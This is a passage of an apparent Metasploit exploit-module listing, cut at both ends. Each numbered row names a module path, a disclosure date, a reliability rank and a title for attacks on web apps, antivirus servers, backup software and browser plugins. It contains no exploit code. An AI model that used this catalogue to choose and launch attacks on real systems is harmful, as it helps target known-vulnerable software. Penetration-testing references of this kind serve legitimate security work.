unix/webapp/havalite_upload_exec 2013-06-17 excellent Yes Havalite CMS Arbitary File Upload Vulnerability + 724 unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution + 725 unix/webapp/hybridauth_install_php_exec 2014-08-04 manual Yes HybridAuth install.php PHP Code Execution + 726 unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution + 727 unix/webapp/invision_pboard_unserialize_exec 2012-10-25 excellent Yes Invision IP.Board unserialize() PHP Code Execution + 728 unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution + 729 unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution + 730 unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution + 731 unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution + 732 unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability + 733 unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution + 734 unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload + 735 unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection + 736 unix/webapp/libretto_upload_exec 2013-06-14 excellent Yes LibrettoCMS File Manager Arbitary File Upload Vulnerability + 737 unix/webapp/maarch_letterbox_file_upload 2015-02-11 excellent Yes Maarch LetterBox Unrestricted File Upload + 738 unix/webapp/mambo_cache_lite 2008-06-14 excellent No Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include + 739 unix/webapp/mitel_awc_exec 2010-12-12 excellent No Mitel Audio and Web Conferencing Command Injection + 740 unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload + 741 unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution + 742 unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution + 743 unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution + 744 unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection + 745 unix/webapp/narcissus_backend_exec 2012-11-14 excellent Yes Narcissus Image Configuration Passthru Vulnerability + 746 unix/webapp/open_flash_chart_upload_exec 2009-12-14 great Yes Open Flash Chart v2 Arbitrary File Upload + 747 unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution + 748 unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File Upload Vulnerability + 749 unix/webapp/opensis_modname_exec 2012-12-04 excellent Yes OpenSIS 'modname' PHP Code Execution + 750 unix/webapp/openview_connectednodes_exec 2005-08-25 excellent No HP Openview connectedNodes.ovpl Remote Command Execution + 751 unix/webapp/openx_banner_edit 2009-11-24 excellent Yes OpenX banner-edit.php File Upload PHP Code Execution + 752 unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Yes Oracle VM Server Virtual Server Agent Command Injection + 753 unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution + 754 unix/webapp/pajax_remote_exec 2006-03-30 excellent No PAJAX Remote Command Execution + 755 unix/webapp/php_charts_exec 2013-01-16 excellent Yes PHP-Charts v1.0 PHP Code Execution Vulnerability + 756 unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation + 757 unix/webapp/php_include 2006-12-17 normal Yes PHP Remote File Include Generic Code Execution + 758 unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution + 759 unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution + 760 unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution + 761 unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload + 762 unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection + 763 unix/webapp/piwik_superuser_plugin_upload 2017-02-05 excellent No Piwik Superuser Plugin Upload + 764 unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability + 765 unix/webapp/projectsend_upload_exec 2014-12-02 excellent Yes ProjectSend Arbitrary File Upload + 766 unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent No QuickTime Streaming Server parse_xml.cgi Remote Execution + 767 unix/webapp/redmine_scm_exec 2010-12-19 excellent No Redmine SCM Repository Arbitrary Command Execution + 768 unix/webapp/seportal_sqli_exec 2014-03-20 excellent Yes SePortal SQLi Remote Code Execution + 769 unix/webapp/simple_e_document_upload_exec 2014-01-23 excellent Yes Simple E-Document Arbitrary File Upload + 770 unix/webapp/sixapart_movabletype_storable_exec 2015-02-11 good Yes SixApart MovableType Storable Perl Code Execution + 771 unix/webapp/skybluecanvas_exec 2014-01-28 excellent Yes SkyBlueCanvas CMS Remote Code Execution + 772 unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution + 773 unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection + 774 unix/webapp/squash_yaml_exec 2013-08-06 excellent Yes Squash YAML Code Execution + 775 unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual No SquirrelMail PGP Plugin Command Execution (SMTP) + 776 unix/webapp/sugarcrm_rest_unserialize_exec 2016-06-23 excellent No SugarCRM REST Unserialize PHP Code Execution + 777 unix/webapp/sugarcrm_unserialize_exec 2012-06-23 excellent No SugarCRM unserialize() PHP Code Execution + 778 unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution + 779 unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution + 780 unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution + 781 unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability + 782 unix/webapp/trixbox_langchoice 2008-07-09 manual Yes Trixbox langChoice PHP Local File Inclusion + 783 unix/webapp/tuleap_rest_unserialize_exec 2017-10-23 excellent Yes Tuleap 9.6 Second-Order PHP Object Injection + 784 unix/webapp/tuleap_unserialize_exec 2014-11-27 excellent Yes Tuleap PHP Unserialize Code Execution + 785 unix/webapp/twiki_history 2005-09-14 excellent Yes TWiki History TWikiUsers rev Parameter Command Execution + 786 unix/webapp/twiki_maketext 2012-12-15 excellent Yes TWiki MAKETEXT Remote Command Execution + 787 unix/webapp/twiki_search 2004-10-01 excellent Yes TWiki Search Function Arbitrary Command Execution + 788 unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection + 789 unix/webapp/vicidial_manager_send_cmd_exec 2013-10-23 excellent Yes VICIdial Manager Send OS Command Injection + 790 unix/webapp/vicidial_user_authorization_unauth_cmd_exec 2017-05-26 excellent Yes VICIdial user_authorization Unauthenticated Command Execution + 791 unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution + 792 unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE + 793 unix/webapp/webtester_exec 2013-10-17 excellent Yes WebTester 5.x Command Execution + 794 unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload + 795 unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion + 796 unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability + 797 unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability + 798 unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability + 799 unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload + 800 unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload + 801 unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution + 802 unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload + 803 unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure + 804 unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload + 805 unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability + 806 unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability + 807 unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution + 808 unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload + 809 unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability + 810 unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability + 811 unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload + 812 unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection + 813 unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload + 814 unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability + 815 unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability + 816 unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability + 817 unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability + 818 unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload + 819 unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload + 820 unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution + 821 unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability + 822 unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability + 823 unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload + 824 unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload + 825 unix/webapp/xoda_file_upload 2012-08-21 excellent Yes XODA 0.4.5 Arbitrary PHP File Upload Vulnerability + 826 unix/webapp/zeroshell_exec 2013-09-22 excellent Yes ZeroShell Remote Code Execution + 827 unix/webapp/zimbra_lfi 2013-12-06 excellent Yes Zimbra Collaboration Server LFI + 828 unix/webapp/zoneminder_packagecontrol_exec 2013-01-22 excellent Yes ZoneMinder Video Server packageControl Command Execution + 829 unix/webapp/zpanel_username_exec 2013-06-07 excellent Yes ZPanel 10.0.0.2 htpasswd Module Username Command Execution + 830 unix/x11/x11_keyboard_exec 2015-07-10 excellent No X11 Keyboard Command Injection + 831 windows/antivirus/ams_hndlrsvc 2010-07-26 excellent No Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution + 832 windows/antivirus/ams_xfr 2009-04-28 excellent No Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution + 833 windows/antivirus/symantec_endpoint_manager_rce 2014-02-24 excellent Yes Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution + 834 windows/antivirus/symantec_iao 2009-04-28 good No Symantec Alert Management System Intel Alert Originator Service Buffer Overflow + 835 windows/antivirus/symantec_rtvscan 2006-05-24 good No Symantec Remote Management Buffer Overflow + 836 windows/antivirus/symantec_workspace_streaming_exec 2014-05-12 excellent Yes Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload + 837 windows/antivirus/trendmicro_serverprotect 2007-02-20 good No Trend Micro ServerProtect 5.58 Buffer Overflow + 838 windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good No Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow + 839 windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good No Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow + 840 windows/arkeia/type77 2005-02-18 good Yes Arkeia Backup Client Type 77 Overflow (Win32) + 841 windows/backdoor/energizer_duo_payload 2010-03-05 excellent No Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution + 842 windows/backupexec/name_service 2004-12-16 average No Veritas Backup Exec Name Service Overflow + 843 windows/backupexec/remote_agent 2005-06-22 great Yes Veritas Backup Exec Windows Remote Agent Overflow + 844 windows/backupexec/ssl_uaf 2017-05-10 normal Yes Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free + 845 windows/brightstor/ca_arcserve_342 2008-10-09 average No Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow + 846 windows/brightstor/discovery_tcp 2005-02-14 average Yes CA BrightStor Discovery Service TCP Overflow + 847 windows/brightstor/discovery_udp 2004-12-20 average Yes CA BrightStor Discovery Service Stack Buffer Overflow + 848 windows/brightstor/etrust_itm_alert 2008-04-04 average No Computer Associates Alert Notification Buffer Overflow + 849 windows/brightstor/hsmserver 2007-09-27 great No CA BrightStor HSM Buffer Overflow + 850 windows/brightstor/lgserver 2007-01-31 average No CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + 851 windows/brightstor/lgserver_multi 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow + 852 windows/brightstor/lgserver_rxrlogin 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + 853 windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow + 854 windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + 855 windows/brightstor/license_gcr 2005-03-02 average No CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow + 856 windows/brightstor/mediasrv_sunrpc 2007-04-25 average No CA BrightStor ArcServe Media Service Stack Buffer Overflow + 857 windows/brightstor/message_engine 2007-01-11 average No CA BrightStor ARCserve Message Engine Buffer Overflow + 858 windows/brightstor/message_engine_72 2010-10-04 average No CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow + 859 windows/brightstor/message_engine_heap 2006-10-05 average No CA BrightStor ARCserve Message Engine Heap Overflow + 860 windows/brightstor/sql_agent 2005-08-02 average No CA BrightStor Agent for Microsoft SQL Overflow + 861 windows/brightstor/tape_engine 2006-11-21 average No CA BrightStor ARCserve Tape Engine Buffer Overflow + 862 windows/brightstor/tape_engine_0x8a 2010-10-04 average No CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow + 863 windows/brightstor/universal_agent 2005-04-11 average No CA BrightStor Universal Agent Overflow + 864 windows/browser/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + 865 windows/browser/adobe_flash_avm2 2014-02-05 normal No Adobe Flash Player Integer Underflow Remote Code Execution + 866 windows/browser/adobe_flash_casi32_int_overflow 2014-10-14 great No Adobe Flash Player casi32 Integer Overflow + 867 windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23 great No Adobe Flash Player copyPixelsToByteArray Method Integer Overflow + 868 windows/browser/adobe_flash_domain_memory_uaf 2014-04-14 great No Adobe Flash Player domainMemory ByteArray Use After Free + 869 windows/browser/adobe_flash_filters_type_confusion 2013-12-10 normal No Adobe Flash Player Type Confusion Remote Code Execution + 870 windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal No Adobe Flash Player MP4 'cprt' Overflow + 871 windows/browser/adobe_flash_otf_font 2012-08-09 normal No Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow + 872 windows/browser/adobe_flash_pcre 2014-11-25 normal No Adobe Flash Player PCRE Regex Vulnerability + 873 windows/browser/adobe_flash_regex_value 2013-02-08 normal No Adobe Flash Player Regular Expression Heap Overflow + 874 windows/browser/adobe_flash_rtmp 2012-05-04 normal No Adobe Flash Player Object Type Confusion + 875 windows/browser/adobe_flash_sps 2011-08-09 normal No Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow + 876 windows/browser/adobe_flash_uncompress_zlib_uninitialized 2014-11-11 good No Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory + 877 windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free + 878 windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 great No Adobe Flash Player AVM Verification Logic Array Indexing Code Execution + 879 windows/browser/adobe_flashplayer_avm 2011-03-15 good No Adobe Flash Player AVM Bytecode Verification Vulnerability + 880 windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal No Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability + 881 windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use + 882 windows/browser/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow + 883 windows/browser/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow + 884 windows/browser/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Heap Corruption + 885 windows/browser/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability + 886 windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal No Adobe Shockwave rcsL Memory Corruption + 887 windows/browser/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free + 888 windows/browser/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow + 889 windows/browser/advantech_webaccess_dvs_getcolor 2014-07-17 normal No Advantech WebAccess dvs.ocx GetColor Buffer Overflow + 890 windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow + 891 windows/browser/aladdin_choosefilepath_bof 2012-04-01 normal No Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow + 892 windows/browser/amaya_bdo 2009-01-28 normal No Amaya Browser v11.0 'bdo' Tag Overflow + 893 windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow + 894 windows/browser/aol_icq_downloadagent 2006-11-06 excellent No America Online ICQ ActiveX Control Arbitrary File Download and Execute + 895 windows/browser/apple_itunes_playlist 2005-01-11 normal No Apple ITunes 4.7 Playlist Buffer Overflow + 896 windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great No Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution + 897 windows/browser/apple_quicktime_mime_type 2012-11-07 normal No Apple QuickTime 7.7.2 MIME Type Buffer Overflow + 898 windows/browser/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow + 899 windows/browser/apple_quicktime_rtsp 2007-01-01 normal No Apple QuickTime 7.1.3 RTSP URI Buffer Overflow + 900 windows/browser/apple_quicktime_smil_debug 2010-08-12 good No Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow + 901 windows/browser/apple_quicktime_texml_font_table 2012-11-07 normal No Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow + 902 windows/browser/ask_shortformat 2007-09-24 normal No Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow + 903 windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow + 904 windows/browser/athocgov_completeinstallation 2008-02-15 normal No AtHocGov IWSAlerts ActiveX Control Buffer Overflow + 905 windows/browser/autodesk_idrop 2009-04-02 normal No Autodesk IDrop ActiveX Control Heap Memory Corruption + 906 windows/browser/aventail_epi_activex 2010-08-19 normal No SonicWALL Aventail epi.dll AuthCredential Format String + 907 windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow + 908 windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent No AwingSoft Winds3D Player 3.5 SceneURL Download and Execute + 909 windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal No BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow + 910 windows/browser/barcode_ax49 2007-06-22 normal No RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow + 911 windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent No Black Ice Cover Page ActiveX Control Arbitrary File Download + 912 windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent No Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute + 913 windows/browser/ca_brightstor_addcolumn 2008-03-16 normal No CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow + 914 windows/browser/chilkat_crypt_writefile 2008-11-03 excellent No Chilkat Crypt ActiveX WriteFile Unsafe Method + 915 windows/browser/chrome_filereader_uaf 2019-03-21 manual No Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86 + 916 windows/browser/cisco_anyconnect_exec 2011-06-01 excellent No Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute + 917 windows/browser/cisco_playerpt_setsource 2012-03-22 normal No Cisco Linksys PlayerPT ActiveX Control Buffer Overflow + 918 windows/browser/cisco_playerpt_setsource_surl 2012-07-17 normal No Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow + 919 windows/browser/cisco_webex_ext 2017-01-21 great No Cisco WebEx Chrome Extension RCE (CVE-2017-3823) + 920 windows/browser/citrix_gateway_actx 2011-07-14 normal No Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability + 921 windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution + 922 windows/browser/communicrypt_mail_activex 2010-05-19 great No CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow + 923 windows/browser/creative_software_cachefolder 2008-05-28 normal No Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow + 924 windows/browser/crystal_reports_printcontrol 2010-12-14 normal No Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow + 925 windows/browser/dell_webcam_crazytalk 2012-03-19 normal No Dell Webcam CrazyTalk ActiveX BackImage Vulnerability + 926 windows/browser/dxstudio_player_exec 2009-06-09 excellent No Worldweaver DX Studio Player shell.execute() Command Execution + 927 windows/browser/ea_checkrequirements 2007-10-08 normal No Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow + 928 windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal No FlipViewer FViewerLoading ActiveX Control Buffer Overflow + 929 windows/browser/enjoysapgui_comp_download 2009-04-15 excellent No EnjoySAP SAP GUI ActiveX Control Arbitrary File Download + 930 windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal No EnjoySAP SAP GUI ActiveX Control Buffer Overflow + 931 windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution + 932 windows/browser/facebook_extractiptc 2008-01-31 normal No Facebook Photo Uploader 4 ActiveX Control Buffer Overflow + 933 windows/browser/firefox_smil_uaf 2016-11-30 normal No Firefox nsSMILTimeContainer::NotifyTimeChange() RCE + 934 windows/browser/foxit_reader_plugin_url_bof 2013-01-07 normal No Foxit Reader Plugin URL Processing Buffer Overflow + 935 windows/browser/getgodm_http_response_bof 2014-03-09 normal No GetGo Download Manager HTTP Response Buffer Overflow + 936 windows/browser/gom_openurl 2007-10-27 normal No GOM Player ActiveX Control Buffer Overflow + 937 windows/browser/greendam_url 2009-06-11 normal No Green Dam URL Processing Buffer Overflow + 938 windows/browser/honeywell_hscremotedeploy_exec 2013-02-22 excellent No Honeywell HSC Remote Deployer ActiveX Remote Code Execution + 939 windows/browser/honeywell_tema_exec 2011-10-20 excellent No Honeywell Tema Remote Installer ActiveX Remote Code Execution + 940 windows/browser/hp_alm_xgo_setshapenodetype_exec 2012-08-29 normal No HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution + 941 windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great No HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution + 942 windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great No HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution + 943 windows/browser/hp_loadrunner_addfile 2008-01-25 normal No Persits XUpload ActiveX AddFile Buffer Overflow + 944 windows/browser/hp_loadrunner_addfolder 2007-12-25 good No HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow + 945 windows/browser/hp_loadrunner_writefilebinary 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX Remote Code Execution + 946 windows/browser/hp_loadrunner_writefilestring 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution + 947 windows/browser/hpmqc_progcolor 2007-04-04 normal No HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow + 948 windows/browser/hyleos_chemviewx_activex 2010-02-10 good No Hyleos ChemView ActiveX Control Stack Buffer Overflow + 949 windows/browser/ibm_spss_c1sizer 2013-04-26 normal No IBM SPSS SamplePower C1Tab ActiveX Heap Overflow + 950 windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal No IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow + 951 windows/browser/ibmegath_getxmlvalue 2009-03-24 normal No IBM Access Support ActiveX Control Buffer Overflow + 952 windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal No IBM Lotus Domino Web Access Upload Module Buffer Overflow + 953 windows/browser/ie_cbutton_uaf 2012-12-27 normal No MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability + 954 windows/browser/ie_cgenericelement_uaf 2013-05-03 good No MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability + 955 windows/browser/ie_createobject 2006-04-11 excellent No MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution + 956 windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability + 957 windows/browser/ie_iscomponentinstalled 2006-02-24 normal No Microsoft Internet Explorer isComponentInstalled Overflow + 958 windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free + 959 windows/browser/ie_unsafe_scripting 2010-09-20 manual No Microsoft Internet Explorer Unsafe Scripting Misconfiguration + 960 windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal No Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control + 961 windows/browser/indusoft_issymbol_internationalseparator 2012-04-28 normal No InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow + 962 windows/browser/inotes_dwa85w_bof 2012-06-01 normal No IBM Lotus iNotes dwa85W ActiveX Buffer Overflow + 963 windows/browser/intrust_annotatex_add 2012-03-28 average No Quest InTrust Annotation Objects Uninitialized Pointer + 964 windows/browser/java_basicservice_impl 2010-10-12 excellent No Sun Java Web Start BasicServiceImpl Code Execution + 965 windows/browser/java_cmm 2013-03-01 normal No Java CMM Remote Code Execution + 966 windows/browser/java_codebase_trust 2011-02-15 excellent No Sun Java Applet2ClassLoader Remote Code Execution + 967 windows/browser/java_docbase_bof 2010-10-12 great No Sun Java Runtime New Plugin docbase Buffer Overflow + 968 windows/browser/java_mixer_sequencer 2010-03-30 great No Java MixerSequencer Object GM_Song Structure Handling Vulnerability + 969 windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection + 970 windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection + 971 windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection + 972 windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal No Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow + 973 windows/browser/kazaa_altnet_heap 2007-10-03 normal No Kazaa Altnet Download Manager ActiveX Control Buffer Overflow + 974 windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code 